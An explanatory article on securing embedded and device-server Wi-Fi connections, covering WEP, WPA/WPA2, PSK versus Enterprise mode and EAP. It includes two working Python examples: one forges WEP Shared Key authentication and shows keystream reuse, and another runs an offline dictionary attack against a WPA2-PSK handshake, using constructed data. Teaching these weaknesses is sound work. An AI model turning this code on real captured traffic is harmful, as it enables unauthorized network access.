Connecting devices like medical instruments, weigh scales, printers, sensors, and other embedded devices to wireless networks gives the user unprecedented freedom and mobility without the need for cumbersome cabling. Traditionally, many of these devices have been confined to one location, and the workflows around them have been prone to human error when someone had to collect readings manually and then transfer them to a computer.
Now that wireless networks are becoming ubiquitous, businesses are looking to connect all types of devices to the wireless network. Unfortunately, this capability is also exposed to unauthorized users, who can intercept data from outside a building or area. That is because wireless networks use radio waves, and radio waves can “leak” at distances of 300 feet or more. Therefore, everything sent over the network, including passwords, financial records, customer databases, and email, can in principle be monitored and stolen by anyone with a laptop computer and a wireless adapter. As a result, businesses need additional levels of security on every device on a wireless network, over and above normal password protection, firewalls, and virus detection.
Device Connectivity Options
Keeping up with the standards in wireless networking (802.11a, 802.11b, 802.11g, 802.11n, etc.), wireless security, and TCP/IP protocols (IPv6, SNMPv3, etc.) can be a monumental undertaking. Fortunately, there are several options for adding wireless capabilities to a device:
- Device Servers are dedicated intelligent products which typically connect to a device externally through a USB or serial port. Software is also available that presents the remote device to the host computer as a local USB or serial port, so existing applications work without change.
- Those looking to incorporate wireless capabilities inside the device can use an Intelligent Network Module, which interfaces with the existing processor over a UART or SPI connection. It offloads the device’s processor and operating system because it includes its own processor, memory, networking stacks, and the hardware and software dedicated to wireless connectivity.
- Higher-volume manufacturers can run the networking on the existing processor, using embedded radio components together with a software stack on their own system.
Software packages with network and wireless drivers, protocol stacks, and wireless security options are available for many processors and operating systems. It is important to use an embedded connectivity solution that supports all of the major wireless networking standards while also providing security and the programmability needed to integrate specialized functions.
Wireless Security Methods
In order to completely protect a wireless local area network, both encryption and authentication security procedures are needed:
- Encryption scrambles your data so that it is very difficult for someone to read unless they have the proper code known as a “key.”
- Authentication is a procedure that verifies a client holds valid credentials before it is allowed to join the network.
The encryption and authentication options available for wireless local area networks include WEP, WPA, WPA2, and EAP, among others. WEP, Open System and Shared Key authentication, and the SSID network name were the first generation of wireless security (note that the SSID is a network identifier that is broadcast or easily discovered, not a secret, so it provides no real protection). The designers of the first wireless local area networks realized that security would be a major issue, so they incorporated both encryption and authentication capabilities into the original IEEE 802.11 standard.
These capabilities include:
- The Wired Equivalent Privacy protocol, or WEP, encryption
- Open System or Shared Key authentication
- Service Set Identifier (SSID or ESSID) network name
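To make the weakness of these first-generation capabilities concrete, here is an added example (not code from the original page) that models WEP's RC4 encryption with a static key and the Shared Key authentication exchange. The key, IV, and challenge values are constructed for illustration. It shows two things a practitioner should recognize: with a fixed key, any two frames that reuse an IV XOR to the XOR of their plaintexts without the key ever being known, and an eavesdropper who watches one Shared Key exchange learns enough keystream to answer the access point's next challenge itself.

```python
"""WEP with a static key: keystream reuse and forged Shared Key authentication.
Added example; all keys, IVs and challenges below are constructed, not captured."""
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream generation), the cipher WEP uses."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian, appended before encryption."""
    return (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte IV in the clear, then RC4(IV || key) over plaintext || ICV."""
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes):
    """Return the plaintext, or None if the ICV does not match."""
    iv, ciphertext = body[:3], body[3:]
    decrypted = rc4(iv + key, ciphertext)
    data, tag = decrypted[:-4], decrypted[-4:]
    return data if icv(data) == tag else None


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def recover_keystream(challenge: bytes, response_body: bytes):
    """Shared Key auth sends the challenge in the clear and its encryption back:
    XOR of the two is the RC4 keystream for that IV (132 bytes)."""
    iv = response_body[:3]
    return iv, xor(challenge + icv(challenge), response_body[3:])


def forge_response(iv: bytes, keystream: bytes, new_challenge: bytes) -> bytes:
    """Answer a fresh challenge without knowing the key: reuse the IV and keystream."""
    return iv + xor(new_challenge + icv(new_challenge), keystream)


def ap_verify(key: bytes, challenge: bytes, response_body: bytes) -> bool:
    """What the access point checks: the response decrypts to the challenge it sent."""
    return wep_decrypt(key, response_body) == challenge


# Constructed sample data: hypothetical 104-bit WEP key, IV, and 128-byte challenges.
WEP_KEY = bytes.fromhex("0badc0ffee0badc0ffee0badc0")
IV = bytes.fromhex("a1b2c3")
CHALLENGE_1 = bytes((i * 7) & 0xFF for i in range(128))
CHALLENGE_2 = bytes((i * 13 + 5) & 0xFF for i in range(128))


def demo_forged_auth() -> bool:
    """Observe one legitimate Shared Key exchange, then pass authentication ourselves."""
    legit_response = wep_encrypt(WEP_KEY, IV, CHALLENGE_1)   # seen on the air
    iv, keystream = recover_keystream(CHALLENGE_1, legit_response)
    forged = forge_response(iv, keystream, CHALLENGE_2)        # attacker's own attempt
    return ap_verify(WEP_KEY, CHALLENGE_2, forged)


def demo_keystream_reuse() -> bool:
    """Two frames under the same static key and IV: ciphertext XOR equals plaintext XOR."""
    p1, p2 = b"temp=37.2C id=0042", b"mass=81.5k id=0042"   # constructed, equal length
    c1 = wep_encrypt(WEP_KEY, IV, p1)[3:]
    c2 = wep_encrypt(WEP_KEY, IV, p2)[3:]
    return xor(c1, c2)[:len(p1)] == xor(p1, p2)


if __name__ == "__main__":
    print("forged Shared Key auth accepted:", demo_forged_auth())
    print("same-IV frames leak plaintext XOR:", demo_keystream_reuse())
```

Because the IV is only 24 bits and the key never changes, IV repeats are a matter of when, not if, on a busy network; the Shared Key forgery needs only a single observed exchange. Neither attack requires recovering the key, which is why rekeying (WPA) rather than a longer static key was the necessary fix.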
Unfortunately, serious weaknesses were found in WEP. Its encryption key is static, and the 24-bit initialization vector combined with it is short enough to repeat, so keystream is reused across frames; its authentication was almost nonexistent, since Open System performs no authentication at all and Shared Key exposes keystream that lets an eavesdropper forge responses. WPA and WPA2 were designed as better ways to secure a wireless network. The Wi-Fi Alliance, a consortium of companies involved in 802.11 technology and services, realized that WEP security was not adequate, and consequently developed a more robust standard known as Wi-Fi Protected Access (WPA). The improvements of WPA include:
- Improved security of encryption keys via the Temporal Key Integrity Protocol (TKIP). Unlike the static WEP key, the key in WPA is dynamically changed (rekeyed), making it much more difficult for an attacker to decrypt a packet. TKIP was a stopgap built on RC4 so that WEP-era hardware could be upgraded in the field; it has since been deprecated and should not be used where AES-CCMP is available.
- Provision for strong authentication capabilities and key management via the IEEE 802.1X standard and a RADIUS authentication server.
WPA was designed to allow field upgrades of existing 802.11 products, but that constraint resulted in some inefficiencies and security compromises. To address the weaknesses in WPA, a second-generation standard known as WPA2 was developed that uses the stronger and more efficient Advanced Encryption Standard (AES) in CCMP mode. WPA2 is a superset of WPA that implements the full IEEE 802.11i standard. Both WPA and WPA2 can operate in either of two modes:
- Pre-shared key mode (WPA-PSK or WPA2-PSK). This mode is designed for small home networks. You create the key by manually entering a passphrase (also known as a shared secret) into each station and the access point; the passphrase and SSID are stretched into a 256-bit pre-shared key. That static key is used to authenticate each station (by proving possession of it during the four-way handshake) and to derive the dynamic per-session keys that actually encrypt the data. The weakness of PSK mode is the pre-shared key itself. It is a single point of failure: every device holds the same secret, so one lost or compromised device exposes the whole network, and because the handshake can be captured by anyone in radio range, a short or dictionary passphrase can be recovered offline.
- Enterprise mode (WPA-Enterprise or WPA2-Enterprise). Enterprise mode is used for larger wireless networks. Rather than a pre-shared key, it uses a separate authentication server, and each client’s master key is derived from its own authentication exchange, so no secret is shared across devices. In WPA-Enterprise and WPA2-Enterprise networks there are three basic types of devices, with roles defined by 802.1X:
- Supplicants. Supplicants include client devices like PCs, printers, and device servers.
- Authenticator. The authenticator (usually the access point) enforces authentication before allowing a supplicant to access network services. It passes authentication requests and responses to supplicants and the authentication server.
- Authentication Server. The authentication server is a special network server that holds (or consults a directory for) the credentials of all users and devices. It verifies those credentials whenever a supplicant attempts to connect to the network.
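The pre-shared key mode described above, worked through as an added example (not code from the original page): the passphrase and SSID are stretched into the pairwise master key, the four-way handshake nonces and MAC addresses expand it into the session keys, and the key confirmation key signs message 2 of the handshake. Because every input to that MIC except the passphrase travels in the clear, a captured handshake lets an attacker test passphrases offline, which is the "single point of failure" the text refers to. The SSID, MAC addresses, nonces, passphrase, and wordlist are all constructed for the example; the PBKDF2 and PRF constructions are those of IEEE 802.11i.

```python
"""WPA2-PSK key hierarchy and an offline passphrase check against a captured
four-way handshake.  Added example; the handshake is constructed, not captured."""
import hashlib
import hmac

MIC_OFFSET = 81   # offset of the 16-byte Key MIC field inside an EAPOL-Key frame
MIC_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK (= PMK in PSK mode) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK via PRF-384 (CCMP): KCK = bytes 0-15, KEK = 16-31, TK = 32-47.
    Addresses and nonces are ordered so both sides build the same input."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for key descriptor version 2 (AES-CCMP): HMAC-SHA1 over the frame
    with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Message 2 of the four-way handshake (supplicant -> authenticator), MIC filled in.
    Simplified: no RSN IE in the key data field."""
    body = (
        b"\x02"              # descriptor type: RSN Key
        + b"\x01\x0a"        # key info: version 2, pairwise, MIC present
        + b"\x00\x10"        # key length (16 bytes for CCMP)
        + b"\x00" * 8        # replay counter
        + snonce             # key nonce
        + b"\x00" * 16       # key IV
        + b"\x00" * 8        # key RSC
        + b"\x00" * 8        # reserved
        + b"\x00" * MIC_LEN  # MIC placeholder
        + b"\x00\x00"        # key data length
    )
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type 3 = EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def recover_passphrase(candidates, ssid, aa, spa, anonce, snonce, msg2):
    """Offline dictionary attack: recompute the MIC for each candidate passphrase
    from the values that were sent in the clear; a match reveals the passphrase."""
    observed = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for cand in candidates:
        ptk = derive_ptk(derive_pmk(cand, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], msg2), observed):
            return cand
    return None


# Constructed sample handshake (hypothetical network name, addresses, nonces, passphrase).
SSID = "PLANT-FLOOR"
AA = bytes.fromhex("001122334455")    # access point (authenticator) MAC
SPA = bytes.fromhex("66778899aabb")   # device (supplicant) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "scale2010"         # deliberately weak, to show the problem


def demo():
    """Simulate the device's message 2, then recover the passphrase from it with a wordlist."""
    ptk = derive_ptk(derive_pmk(REAL_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
    msg2 = build_msg2(SNONCE, ptk[:16])
    wordlist = ["password", "12345678", "scale2010", "printer01"]   # constructed
    return recover_passphrase(wordlist, SSID, AA, SPA, ANONCE, SNONCE, msg2)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The 4096-iteration PBKDF2 slows each guess but does not change the picture: a PSK is only as strong as the passphrase behind it, and one compromised embedded device leaks the same secret that every other device on that SSID uses. That is the argument for Enterprise mode, where each supplicant gets its own master key from its own authentication.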
The authentication server, usually a RADIUS (Remote Authentication Dial-In User Service) server, can be implemented as software on one of your servers (for example, Microsoft’s IAS), as a dedicated network appliance, or as an embedded part of the access point. 802.1X carries EAP (Extensible Authentication Protocol), a framework designed to work with a variety of different authentication methods. This gives 802.1X (and consequently WPA, WPA2, and 802.11i) the flexibility to handle new authentication methods as they emerge. The WPA and WPA2 standards allow for five different types of EAP authentication, among them:
- EAP-SIM
Each of these types has advantages and disadvantages. Whichever is chosen, a supplicant that authenticates the server through a certificate must be configured to actually validate that certificate (trusted CA and expected server name); otherwise a rogue access point can impersonate the network and collect the device’s credentials.
Other EAP types include EAP-MD5 and the Cisco-proprietary LEAP and EAP-FAST. EAP-MD5 authenticates only the client and derives no keying material, and LEAP is susceptible to offline dictionary attacks, so neither is suitable for wireless use. Non-EAP approaches such as Kerberos and Virtual Private Networks (VPNs) are not part of the WPA or WPA2 standards. Since these methods are not covered by WPA or WPA2 and offer little or no advantage at the wireless link layer, they should generally not be implemented as the security mechanism for new wireless local area networks.
With the emergence of wireless local area networks, wireless devices are becoming very popular because they allow devices to be mobile. Security is an issue with device servers because they often send and receive sensitive data, such as confidential patient medical information, using the same TCP/IP protocols as computers. Therefore, strong security is required to prevent unauthorized users from monitoring this information or using the device server as a foothold into your network. Wireless networks are especially exposed because anyone in range can monitor the radio waves. Fortunately, the latest wireless security standards are very solid. Remember, you must implement strong security on all your wireless devices, not just your access points and computers, because your network’s security is only as strong as its weakest link.